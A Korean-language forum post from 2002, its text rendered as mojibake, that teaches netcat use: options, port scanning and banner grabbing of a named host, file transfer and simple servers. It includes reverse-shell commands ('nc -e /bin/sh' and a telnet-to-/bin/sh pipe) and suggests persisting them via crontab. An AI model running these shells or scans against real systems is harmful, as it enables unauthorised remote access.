BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡

±Û¾´ÀÌ: netcat nc »ç¿ë¼³¸í¼­ Á¶È¸¼ö: 9729


ÇÏÀÕ

[Mini how-to] Netcat for Windows NT
NetcatÀÇ ¼Ò°³

Netcat(ÀÌÇÏ nc·Î Ç¥±â)Àº Network connection ¿¡¼­ raw-data read, write¸¦ ÇÒ¼ö ÀÖ´Â À¯Æ¿¸®Æ¼ ÇÁ·Î±×·¥ÀÌ´Ù. ÀϹÝÀûÀ¸·Î´Â UNIXÀÇ cat°ú ºñ½ÁÇÑ »ç¿ë¹ýÀ» °¡Áö°í ÀÖÁö¸¸ catÀÌ ÆÄÀÏ¿¡ ¾²°Å³ª ÀеíÀÌ nc´Â network connection¿¡ Àаųª ¾´´Ù. ÀÌ°ÍÀº ½ºÅ©¸³Æ®¿Í º´¿ëÇÏ¿© network¿¡ ´ëÇÑ debugging, testing tool·Î½á ¸Å¿ì Æí¸®ÇÏÁö¸¸ ¹Ý¸é ÇØÅ·¿¡µµ ÀÌ¿ë¹üÀ§°¡ ¸Å¿ì ³Ð´Ù.

Options
--------------------------------------------------------------------------

usage: nc [options] [target host] [ports]

-n : È£½ºÆ® ³×ÀÓ°ú Æ÷Æ®¸¦ ¼ýÀڷθ¸ ÀԷ¹޴´Ù.

-v : verbosity ¸¦ Áõ°¡ ½ÃŲ´Ù. ´õ ¸¹Àº Á¤º¸¸¦ ¾òÀ»¼ö ÀÖ´Ù.

-o [filename]: º¸³»°Å³ª ¹ÞÀº µ¥ÀÌÅ͸¦ Çí½º´ýÇÁÇÏ¿© ÆÄÀÏ¿¡ ÀúÀåÇÑ´Ù.

-u : TCP connection ´ë½Å¿¡ UDP connection ÀÌ ÀÌ·ç¾î Áø´Ù.

-p [port number or name]: local-port ¸¦ ÁöÁ¤ÇÑ´Ù. ÁÖ·Î -l °ú °°ÀÌ »ç¿ëÇÏ°Ô µÈ´Ù.

-s [ip address or DNS]: local ip address ¸¦ ÁöÁ¤ÇÑ´Ù. ¸ðµç Ç÷¿Æû¿¡¼­ Áö¿øµÇÁö´Â ¾Ê´Â´Ù.

-l : listen ¸ðµå·Î ncÀ» ¶ì¿ì°Ô µÈ´Ù. ´ç¿¬È÷ target host´Â ÀÔ·ÂÇÏÁö ¾Ê´Â´Ù. -p¿Í °°ÀÌ »ç¿ëÇÏ°Ô µÈ´Ù. nc¸¦ server ·Î¼­ ¾µ¶§ »ç¿ë.

-e [filename]: -DGAPING_SECURITY_HOLE ¿É¼ÇÀ¸·Î Make µÇ¾úÀ» ¶§ »ç¿ë°¡´ÉÇÏ´Ù.
connection ÀÌ ÀÌ·ç¾î Á³À» ¶§ fileÀ» exec ½ÃŲ´Ù. -l °ú °°ÀÌ »ç¿ëµÇ¸é ÇÑ instance¸¸À» »ç¿ëÇÏ´Â inetd¿Í ºñ½ÁÇÏ´Ù.

-t : -DTELNET ¿É¼ÇÀ¸·Î ÄÄÆÄÀÏ µÇ¾úÀ» ¶§ »ç¿ë°¡´ÉÇÏ´Ù. telnetd¿¡ Á¢¼ÓÀÌ °¡´ÉÇϵµ·Ï
Á¢¼Ó½Ã telnet°ú °°Àº Çù»ó°úÁ¤À» °ÅÄ£´Ù.

-i [interval time]: nc´Â ÀϹÝÀûÀ¸·Î 8K ¾¿ µ¥ÀÌÅ͸¦ º¸³»°í ¹Þ´Âµ¥ ±×·¸°Ô Standard inputÀÇ ÇÑ ¶óÀξ¿ interval time¸¶´Ù º¸³»°Ô µÈ´Ù.

-z : connectionÀ» ÀÌ·ç±âÀ§ÇÑ ÃÖ¼ÒÇÑÀÇ µ¥ÀÌÅÍ ¿Ü¿¡´Â º¸³»Áö ¾Êµµ·Ï ÇÏ´Â ¿É¼Ç.

-r : port ÁöÁ¤ÀÌ ¿©·¯°³·Î µÇ¾î ÀÖÀ¸¸é À̶§ scanning ¼ø¼­¸¦ randomizeÇÏ°í (ÀϹÝÀûÀ¸·Î ¹üÀ§·Î ÁöÁ¤ÇÏ¸é ³ôÀº ¹øÈ£ÀÇ Æ÷Æ®ºÎÅÍ ½ºÄµÇÑ´Ù) ¶ÇÇÑ -p ¿É¼Ç¿¡¼­ ÁöÁ¤°¡´ÉÇÑ local portµµ randomizeÇÑ´Ù. À̶§ ÁÖÀÇ ÇÒ °ÍÀº -p°¡ -rÀ» override ÇÑ´Ù´Â °ÍÀÌ´Ù.

-g : ??

-G : ??

Using
--------------------------------------------------------------------------

multi-port connection

nc´Â ÇÑ È£½ºÆ®¿¡ ÇÑ ¹ø¿¡ ¿©·¯ connection À» ¸¸µé¼ö ÀÖ´Ù. ÀÌ ¶§ ´ÙÀ½°ú °°ÀÌ ¿©·¯°³ÀÇ Æ÷Æ®¸¦ ±â¼úÇÒ ¼ö ÀÖ´Ù.
nc [target host] 20-30

À̶§ std inputÀ¸·Î ÀԷµǴ µ¥ÀÌÅÍ´Â ÇѲ¨¹ø¿¡ º¸³»Áö°Ô µÈ´Ù.

port scanning

target host ÀÇ ÁöÁ¤µÈ ¹üÀ§³»¿¡¼­ÀÇ ¾î¶² Æ÷Æ®°¡ ¾î¶»°Ô »ç¿ëµÇ°í ÀÖ´Â °¡¸¦ °Ë»öÇÒ ¼ö ÀÖ´Ù.
nc -v -w 3 -z sparcs.kaist.ac.kr 20-30, 70-90

À§ÀÇ ¸í·ÉÀº ´ÙÀ½ °á°ú¿Í °°ÀÌ 20-30, 70-90 ±îÁöÀÇ Æ÷Æ®µé¿¡ ´ëÇÑ Á¤º¸¸¦ º¸¿©ÁØ´Ù.

sparcs.kaist.ac.kr [143.248.8.2] 25 (smtp) open
sparcs.kaist.ac.kr [143.248.8.2] 23 (telnet) open
sparcs.kaist.ac.kr [143.248.8.2] 21 (ftp) open
sparcs.kaist.ac.kr [143.248.8.2] 80 (http) open
sparcs.kaist.ac.kr [143.248.8.2] 79 (finger) open
sparcs.kaist.ac.kr [143.248.8.2] 70 (gopher) open

À̰ͺ¸´Ù ´õ ÀÚ¼¼ÇÑ Á¤º¸¸¦ ¾ò°íÀÚ ÇÒ¶§´Â

echo QUIT | nc -v -w 3 [target host] [ports]

¶ó°í Çϸé ÀÀ´äÀ̳ª ¿¡·¯¸Þ¼¼Áö·ÎºÎÅÍ ¹öÀüÁ¤º¸µîµµ ¾òÀ» ¼ö ÀÖ´Ù.

[songa@sparcs.kaist.ac.kr] ~ 13 echo QUIT | nc -v -w 3 sparcs 20-30, 70-90
sparcs.kaist.ac.kr [143.248.8.2] 25 (smtp) open
220 sparcs.kaist.ac.kr ESMTP Sendmail 8.8.7/8.8.7; Fri, 8 Jan 1999 15:21:36
+0900
221 sparcs.kaist.ac.kr closing connection
sparcs.kaist.ac.kr [143.248.8.2] 23 (telnet) open
sparcs.kaist.ac.kr [143.248.8.2] 21 (ftp) open
220 sparcs.kaist.ac.kr FTP server (Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3
19:17:20 EDT 1998) ready.
221 Goodbye.
sparcs.kaist.ac.kr [143.248.8.2] 80 (http) open
sparcs.kaist.ac.kr [143.248.8.2] 79 (finger) open
finger: QUIT: no such user.
sparcs.kaist.ac.kr [143.248.8.2] 70 (gopher) open


simple data transfer agent

nc¸¦ ÀÌ¿ëÇØ °£´ÜÇÑ data Àü¼ÛÀ» ÇÒ ?ÀÖ´Ù.
receiver : nc -l -p 1234 | uncompress -c | tar xvfp -

sender : tar cfp - /some/dir | compress -c | nc -w 3 othermachine 1234


substitute of inetd

nc¸¦ ÀÌ¿ëÇØ inetd¿¡ µî·ÏÇÏÁö ¾Ê°í, º°´Ù¸¥ ³×Æ®¿÷ ¼³Á¤ ¾øÀÌ ÇÁ·Î±×·¥À» Å×½ºÆ®ÇÒ ¼ö ÀÖ´Ù.
nc -l -p [port] -e [filename]


/*test.c*/
#include < stdio.h >
main(){
getchar();
printf("<html><head></head><body>ÇáÇÏ</body></html>\n");


nc -l -p 1234 -e test

ÀÌ·¸°Ô ÇÏ¸é °£ÀÌ www server µµ µÈ´Ù.

connection redirecting
inetd.confÀ» ¾Æ·¡¿Í °°Àº Çü½ÄÀ¸·Î °íÃļ­ ´Ù¸¥ ¼­¹ö·Î redirectingÀ» ÇÒ¼ö ÀÖ´Ù.

www stream tcp nowait /etc/tcpd /bin/nc -w 3 zero 80

À§ÀÇ °ÍÀº ÇöÀç ¼­¹ö¿¡¼­ http¼­ºñ½º¸¦ zero¼­¹ö·Î redirect½ÃÄ×´Ù.

performance testing

nc¸¦ ÀÌ¿ëÇؼ­ Å« µ¥ÀÌÅ͸¦ ¼­·Î º¸³»°í ¹ÞÀ½À¸·Î½á networkÀÇ performance¸¦ Å×½ºÆ®ÇÒ¼öÀÖ´Ù.
[songa@sparcs.kaist.ac.kr] /etc 31 > yes AAAA | nc -v -v -l -p 1234 > /dev/nul&
[1] 3258 3259
[songa@sparcs.kaist.ac.kr] /etc 32 > listening on [any] 1234 ...
[songa@sparcs.kaist.ac.kr] /etc 32 >
[songa@sparcs.kaist.ac.kr] /etc 32 >
[songa@sparcs.kaist.ac.kr] /etc 32 > yes BBBB | nc sparcs 1234 > /dev/null &
[2] 3475 3476
[songa@sparcs.kaist.ac.kr] /etc 33 > connect to [143.248.8.2] from sparcs.kaisac.kr
[143.248.8.2] 31844
[songa@sparcs.kaist.ac.kr] /etc 33 > kill %
[songa@sparcs.kaist.ac.kr] /etc 34 > sent 23470080, rcvd 21675480





±×¸®°í

http://www.wowhacker.com/BoArD/view.php?id=abc_lecture&page=1&category=&sn=off&ss=on&sc=on&keyword=netcat&select_arrange=headnum&desc=asc&no=152

¿©±âµµ ÀÖ±¸¿ä..

Áö±ÝºÎÅÍ ¾Æ·¡³»¿ëÀÇ ¹®¼­´Â

http://security.xmecca.comÀÇ Oprix´ÔÀÌ ¾²½Å ±ÛÀÔ´Ï´Ù





Netcat == nc

ÀÌ ¹®¼­¸¦ ¾²½Ç ¶§ Ãâó(http://security.xmecca.com)¸¦ ²À Àû¾î Áֽøé
¾î´À °÷À̳ª ¾²½Ç ¼ö ÀÖ½À´Ï´Ù.
BBS¿¡ ±Û±îÁö ³²°ÜÁÖ½Ã¸é ´õ¿í °í¸¿°Ú½À´Ï´Ù.

Netcat ReadMe¸¦ ºÎºÐºÎºÐ ¹ø¿ªÇß½À´Ï´Ù.
===========================================================

Netcat(°£´ÜÇÏ°Ô nc¶ó°íµµ ÇÔ)Àº http://www.l0pht.com/users/10pht/nc110.tgz ¿¡¼­ ±¸ÇÒ ¼ö ÀÖ½À´Ï´Ù.

NetcatÀº TCP³ª UDP ³×Æ®¿öÅ© ¿¬°áÀ» ÅëÇؼ­ µ¥ÀÌÅ͸¦ Àаųª ¾µ ¼ö ÀÖµµ·Ï ¸¸µç ÇÁ·Î±×·¥ÀÔ´Ï´Ù.
Ưº°ÇÏ°Ô ½© ½ºÅ©¸³Æ®³ª ´Ù¸¥ ÇÁ·Î±×·¥¿¡¼­ »ç¿ëÇϵµ·Ï ¸¸µç "Back-end" ÅøÀÔ´Ï´Ù.
±×¿Í µ¿½Ã¿¡ ¾à°£ÀÇ Àç¹ÌÀÖ´Â ¿©·¯°¡Áö ¿¬°á·Î ³×Æ®¿öÅ©¸¦ µð¹ö±ëÇÏ°í Á¶»çÇÒ ¼ö ÀÖ°Ô ¸¸µç ÅøÀÔ´Ï´Ù.
NetcatÀº ½ÇÁ¦·Î nc¶ó´Â ÇÁ·Î±×·¥À̸§À» °¡Áö°í ÀÖ½À´Ï´Ù.
¿¹ÀüºÎÅÍ ½Åºñ·ÓÁö¸¸ Ç¥ÁØÀûÀÎ À¯´Ð½º Åø·Î Á¦°øµÇ¾ú½À´Ï´Ù. ( ±×·±°¡ -_-;;)

°£´ÜÇÑ »ç¿ë¹ýÀ¸·Î "nc host port" Çϸé ÁÖ¾îÁø È£½ºÆ®ÀÇ Æ¯Á¤ Æ÷Æ®·Î TCP ¿¬°áÀ» ÇÕ´Ï´Ù. ±×¸®°í
¿©·¯ºÐÀÇ Ç¥ÁØ ÀÔ·ÂÀ» ±× ÂÊÀ¸·Î º¸³À´Ï´Ù. ±×¸®°í Ç¥ÁØ Ãâ·ÂÀ» ¿¬°áÀ» ÅëÇؼ­
ÀÌÂÊ¿¡ º¸¿©ÁÝ´Ï´Ù. ÀÌ°Ç ÇÑÂÊ ³×Æ®¿öÅ©°¡ ´Ù¿î µÉ¶§±îÁö °è¼ÓÇÒ ¼ö ÀÖ½À´Ï´Ù. end-of-fileÀ»
ÀÔ·ÂÇϸé Á¾·áµÇ´Â ´Ù¸¥ ÇÁ·Î±×·¥°ú ´Ù¸£°Ô °è¼Ó ÀÛµ¿ÇÕ´Ï´Ù.

¶ÇÇÑ NetCatÀº ¼­¹ö·Î »ç¿ëÇÒ ¼ö ÀÖ½À´Ï´Ù. ÁöÁ¤ÇÑ Æ÷Æ®·Î µé¾î¿À´Â ¿¬°áÀ» ±â´Ù¸®µµ·Ï »ç¿ëÇÒ ¼ö ÀÖ½À´Ï´Ù.

±×¸®°í UDP¸¦ ÅëÇؼ­µµ ÀÌ·¸°Ô ÇÒ ¼ö ÀÖ½À´Ï´Ù. TCP º¸´Ù ´ú ½Å·ÚµÇ°í ¾î¶²
½Ã½ºÅÛ¿¡¼­´Â ¸¹Àº µ¥ÀÌÅ͸¦ º¸³¾ ¼ö ¾øÁö¸¸ À¯¿ëÇÒ ¶§°¡ ÀÖ½À´Ï´Ù.

NetCatÀÌ ÇÒ ¼ö ÀÖ´Â ´ëÇ¥ÀûÀÎ ÀϷδÂ

Outbound or inbound connections, TCP or UDP, to or from any ports
Full DNS forward/reverse checking, with appropriate warnings
Ability to use any local source port
Ability to use any locally-configured network source address
Built-in port-scanning capabilities, with randomizer
Built-in loose source-routing capability
Can read command line arguments from standard input
Slow-send mode, one line every N seconds
Hex dump of transmitted and received data
Optional ability to let another program service established connections
Optional telnet-options responder

ÀÌ°ÍÀÌ ÀÖ½À´Ï´Ù. (ÀÌ°Ç ¿©·¯ºÐ °¢ÀÚ°¡ ¹ø¿ªÇØ º¸¼¼¿ä.)

¸¸µå´Â ¹ý

http://www.l0pht.com/users/10pht/nc110.tgz ¿¡¼­ ±¸ÇÒ ¼ö ÀÖ½À´Ï´Ù.

¾ÐÃàÀ» Ç®°í

Ưº°ÇÏ°Ô ¼³Á¤ÇÒ °Ç ¾ø°í

Makefile¿¡¼­ -DGAPING_SECURITY_HOLE ÀÌ ºÎºÐÀ» Ãß°¡ ½ÃÄÑÁÖ´Â°Ô Áß¿äÇÕ´Ï´Ù.
ÀÌ°Ô ¾øÀ¸¸é À¯¿ëÇÑ -e ¿É¼ÇÀ» ¾²Áö ¸øÇÕ´Ï´Ù.

### HARD TARGETS

nc: netcat.c
$(LD) $(DFLAGS) $(XFLAGS) $(STATIC) -DGAPING_SECURITY_HOLE -o nc netcat.c $(XLIBS)

°íÄ£´ÙÀ½ make linux ÇÏ¸é µË´Ï´Ù.

ÀÚ »ç¿ëÇØ º¸±â Àü¿¡ µµ¿ò¸»À» º¾½Ã´Ù.

$ ./nc -h
[v1.10]
¾î´À °÷¿¡ Á¢¼ÓÇÒ¶§: nc [-¿É¼Ç] hostname port[s] [ports] ...
Á¢¼ÓÀ» ±â´Ù¸±¶§: nc -l -p port [-options] [hostname] [port]
options:
-e prog ÇÁ·Î±×·¥ Á¢¼ÓÈÄ ÇÁ·Î±×·¥À» ½ÇÇàÇÑ´Ù. [ À§Çè ]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h µµ¿ò¸»
-i secs ¶óÀÎÀ» º¸³¾ ¶§ ¸¶´Ù secs ¸¸Å­ ½®´Ù. ½ºÄµÇÒ¶§ »ç¿ë
-l listen ¸ðµå , µé¾î¿À´Â ÆÐŶ¿¡ ¹ÝÀÀÇÑ´Ù.
-n DNS¸¦ ÀÌ¿ëÇÏÁö ¾Ê°í IP ÁÖ¼Ò¸¦ »ç¿ëÇÑ´Ù.
-o file ³»¿ëÀ» file¿¡ ±â·ÏÇÑ´Ù.
-p port ·ÎÄà Æ÷Æ® ¹øÈ£
-r ÄÄÇ»ÅÍ°¡ ¸¶À½´ë·Î Æ÷Æ®¸¦ ÁöÁ¤ÇÑ´Ù.
-s addr local source address
-u UDP ¸ðµå
-v Ãâ·ÂÀ» ÀÚ¼¼ÇÏ°Ô ÇÑ´Ù.
-w secs ¸¶Áö¸·À¸·Î ÀÐÀº ´ÙÀ½ secs ÈÄ¿¡ Á¾·áÇÑ´Ù.
-z ¾Æ¹« µ¥ÀÌÅ͵µ ¾È º¸³½´Ù. scan ¶§ »ç¿ë
Æ÷Æ®´Â ÇϳªÇϳª ÁöÁ¤Çϰųª ¹üÀ§¸¦ ¾µ ¼ö ÀÖ½À´Ï´Ù. ³·Àº Æ÷Æ®-³ôÀº Æ÷Æ®




ÀÌ ¹®¼­¸¦ ¾²½Ç ¶§ Ãâó(http://security.xmecca.com)¸¦ ²À Àû¾î Áֽøé
¾î´À °÷À̳ª ¾²½Ç ¼ö ÀÖ½À´Ï´Ù.
BBS¿¡ ±Û±îÁö ³²°ÜÁÖ½Ã¸é ´õ¿í °í¸¿°Ú½À´Ï´Ù.

Netcat ReadMe¸¦ ºÎºÐºÎºÐ ¹ø¿ªÇß½À´Ï´Ù.
===========================================================
°£´ÜÇÑ ½ºÄ³´× Åø·Î »ç¿ëÇÒ ¼ö ÀÖ½À´Ï´Ù.

$ echo QUIT | nc -v -w 5 localhost 25-100
localhost.localdomain [127.0.0.1] 25 (smtp) open
220 s210-219-158-88.thrunet.ne.kr ESMTP Sendmail 8.9.3/8.9.3; Thu, 31 May 2001 00:30:34 +0900
221 s210-219-158-88.thrunet.ne.kr closing connection

$ nc -v -w 5 localhost 25-100 ÀÌ·¸°Ô ÇÏ¸é ¿­¸° Æ÷Æ®¸¸ º¼ ¼ö ÀÖ½À´Ï´Ù.

ÆÄÀÏ Àü¼Û¿¡µµ »ç¿ëµË´Ï´Ù.

º¸³»´Â ÂÊ
$ cat html.tgz | nc -w 3 x.x.x.x 1234

¹Þ´Â ÂÊ
$ nc -l -p 1234 > html.tgz

°£´ÜÇÑ ¹æÈ­º®À¸·Î »ç¿ëµË´Ï´Ù.

ined.conf¿¡

[realwww´Â ½ÇÁ¦ À¥¼­¹ö ÁÖ¼Ò]

www stream tcp nowait nobody /etc/tcpd /bin/nc -w 3 realwww 80

³×Æ®¿öÅ© ¼º´É Æò°¡

¼­·Î ¼ø¼­¸¦ ´Þ¸®Çؼ­ ÇØ º¸¾Ò½À´Ï´Ù.

A ¼­¹ö
$ yes BBBBBBBBBBBBBBBBBBBBBB | /tmp/nc x.x.x.x 2222 > /dev/null
Broken pipe
$ yes AAAAAAAAAAAAAAAAAAAAAA | /tmp/nc -v -v -l -p 2222 > /dev/null
listening on [any] 2222 ...
connect to [x.x.x.x] from x.x.x.x [x.x.x.x] 2790
sent 6643712, rcvd 9542784

A°¡ ¸¹ÀÌ ¹ÞÀ½

B ¼­¹ö
$ yes AAAAAAAAAAAAAAAAAAAAAA | nc -v -v -l -p 2222 > /dev/null
listening on [any] 2222 ...
203.239.110.12: inverse host lookup failed: Unknown host
connect to [x.x.x.x] from (UNKNOWN) [x.x.x.x] 1672
sent 11145216, rcvd 8092008
$ yes BBBBBBBBBBBBBBBBBBBBBB | nc x.x.x.x 2222 > /dev/null
Broken pipe

B°¡ ¸¹ÀÌ º¸³¿

·Î±× µ¥ÀÌŸ º¸³»±â

½© ½ºÅ©¸³Æ®¿¡¼­ ·Î±×µµ º¸³¾ ¼ö ÀÖ½À´Ï´Ù.

echo '<38>message' | nc -w 1 -u loggerhost 514

°£ÀÌ À¥ ¼­¹ö
/* °£ÀÌ À¥¼­¹ö´Â Ãâó°¡ http://security.kaist.ac.kr/docs/netcat.html ÀÔ´Ï´Ù. */
nc¸¦ ÀÌ¿ëÇØ °£´ÜÇÑ À¥¼­¹ö·Îµµ »ç¿ëÇÒ ¼ö ÀÖ½À´Ï´Ù.

nc -l -p [port] -e [filename]

/*test.c*/
#include < stdio.h >
main(){
getchar();
printf("ÇáÇÏn");

nc -l -p 1234 -e test

Reverse telnet

¸ÕÀú ÀÌ·± »óȲÀ» »ý°¢ÇØ º¾½Ã´Ù. A¶ó´Â ¼­¹ö¿¡¼­´Â ¾î´À °÷À̳ª Á¢¼ÓÇÒ
¼ö ÀÖ½À´Ï´Ù. B¶ó´Â ¼­¹ö¿¡¼­´Â ¹æÈ­º® ¶§¹®¿¡ A¶ó´Â °÷¿¡ Á¢¼ÓÇÒ ¼ö ¾ø
½À´Ï´Ù. ÀÌ·² °æ¿ì »ç¿ëÇÏ´Â°Ô Reverse telnet À̶ó´Â ±â¼úÀÔ´Ï´Ù.
Áï A¶ó´Â °÷¿¡¼­ B¶ó´Â °÷À¸·Î Á¢¼ÓÀ» ÇÏÁö¸¸ B¿¡¼­ ¸í·ÉÀ» ³»¸± ¼ö ÀÖ´Ù´Â
°Ì´Ï´Ù. crontab¿¡ ÀúÀåÇØµÎ¸é ¾µ¸ð ÀÖ°ÚÁö¿ä.

B ¼­¹öÀÇ ¼³Á¤

$ nc -l -p 1234

A ¼­¹öÀÇ ¼³Á¤
$ nc -e /bin/sh B¼­¹ö ÁÖ¼Ò 1234

B¿¡¼­ ¸í·ÉÀ» ³»¸± ¼ö ÀÖ½À´Ï´Ù.

$ nc -l -p 1234
ls <-- »ç¿ëÀÚ°¡ Ä£ ¸í·É
Desktop
Mail
collect.data
dead.letter
epcs2.c
face2.gif
face_.gif
html.tgz

½Ç·ÂÀÌ µÇ½Ã¸é netcat Readme¸¦ ²À Àо¼¼¿ä.


// ÆÁÀ¸·Î »ç¿ëÇÏ½Ã¶ó±¸ Reverse Telnet ºÎºÐµµ ³Ö¾ú½À´Ï´Ù

// ¹°·Ð, Ãâó´Â Oprix´ÔÀÔ´Ï´Ù

¾Æ·¡¿¡¼­ °£´ÜÇÑ nc ±â´É À¸·Î Reverse telnet À» ±¸ÇöÇØ º¸¾Ò½À´Ï´Ù. ±×·±µ¥ ¸¸¾à »ó´ëÆí¿¡ Netcat ÀÌ ¾ø´Ù¸é??

¾î¶»°Ô ÇÒ±î¿ä? °­Á¸¸ Àд ºÐµé BBS¿¡ ±Û ³²±â¼¼¿ä. s[¤Ñ«Ø¤Ñ]z

¸ÕÀú ¾Æ·¡ÀÇ nc ¿¡ ´ëÇؼ­ Àß ÀÐ¾î º¸½Ã±¸¿ä. »ç¿ëÇØ º»´ÙÀ½ Çغ¸¼¼¿ä.

A¿¡¼­ B·Î Á¢¼ÓÀ» Çϴµ¥ B¿¡¼­ A·Î ¸í·ÉÀ» ³»¸®´Â °Ì´Ï´Ù.

A(211.211.211.211) --------> B (211.211.211.212)

B¿¡¼­ âÀ» 2°³¸¦ ¶ç¿ö¼­ nc¸¦ 2°³¸¦ ¶ç¿ö ³õ½À´Ï´Ù.

ù¹ø° â
$ nc -l -p 3456

µÎ¹ø° â
$ nc -l -p 7890

ÀÌ·¸°Ô ÇسõÀº ´ÙÀ½

A¿¡¼­ ÀÌ·¸°Ô ¸í·ÉÀ» ³»¸³´Ï´Ù.

$ telnet 211.211.211.212 3456 | /bin/sh |telnet 211.211.211.212 7890

ÀÌ·¸°Ô ÇÑ´ÙÀ½

BÀÇ Ã¹¹ø° â¿¡¼­ ls ¶ó°í Çѹø Ãĺ¸¼¼¿ä. ¾Æ¹« ¹ÝÀÀÀÌ ¾øÁö¿ä. ^^

À̶§ BÀÇ µÎ¹ø° âÀ» ºÁ º¸¼¼¿ä. °á°ú´Â °Å±â¿¡ ³ªÅ¸³³´Ï´Ù.

½Å±â ÇÏÁö¿ä. ^^

¿Ö Àú·¸°Ô Çϸé ÀÌ·± Çö»óÀÌ ³ª¿À´ÂÁö ÆÄÀÌÇÁ¿¡ ´ëÇؼ­ °õ°õÈ÷ »ý°¢ÇØ º¸¼¼¿ä.

À̱ÛÀº Ãâó(http://security.xmecca.com)¸¦ ¾Ë·ÁÁÖ½Ã¸é ¾î´À °÷¿¡³ª ¾µ ¼ö ÀÖ½À´Ï´Ù. thanks truefinder

°ü·Ã±Û : ¾øÀ½ ±Û¾´½Ã°£ : 2002/12/16 4:04 from 211.108.146.69

  Retina Network Security Scanner ¸ñ·Ïº¸±â »õ±Û ¾²±â Áö¿ì±â ÀÀ´ä±Û ¾²±â ±Û ¼öÁ¤ (»ì·ÈÀ½)¸®´ª½ºº¸¾È±³Àç-1005  
BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡